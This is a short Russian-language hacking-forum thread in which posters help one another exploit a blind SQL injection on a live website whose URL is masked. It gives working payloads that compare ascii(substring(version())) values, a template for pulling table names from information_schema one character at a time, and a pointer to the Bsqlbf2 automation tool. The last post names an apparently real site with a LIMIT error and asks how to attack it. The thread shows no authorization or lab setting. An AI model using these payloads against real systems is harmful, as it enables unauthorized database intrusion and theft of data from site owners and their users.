есть бажнии саит ! слепая sql injection!

пример :

http://********/concurs.php?id=4+AND+substring(version(),1,1)=5

резулитат : TRUE

а если :

http://*******/concurs.php?id=4+AND+ascii(lower(substring(version (),1,1)))=5

резулитат : FALSE

почему ????

читал статию http://injection.rulezz.ru/mysql_char_brute.html но чёта не как там описано ! help!

потому что код 5ки во втором запросе должен быть 53

http://*******/concurs.php?id=4+AND+ascii(lower(substring(version (),1,1)))=53

Ты приводиш первый символ значения переменной version() к типу ASCII т.е. к ее коду а он равен 53

посиба ! подскажи как составить запрос типа : SELECT table_name from information_schema.tables

на том же примере ???

http://*******/concurs.php?id=4+AND+ascii(lower(substring("ЗАПРОС",1,1)))="ПЕРЕБИРАТЬ каждую букву методом схождения"

гдето есть софт для автоматизации процесса даже по слепой инъекции - ищите.
мне некогда )

Bsqlbf2
_https://forum.antichat.ru/threadnav20879-1-10.html

народ что можно сдеалть с ошибкой в LIMIT? вот пример где ошибка http://mybits.ws:80/browse.php?page=0.01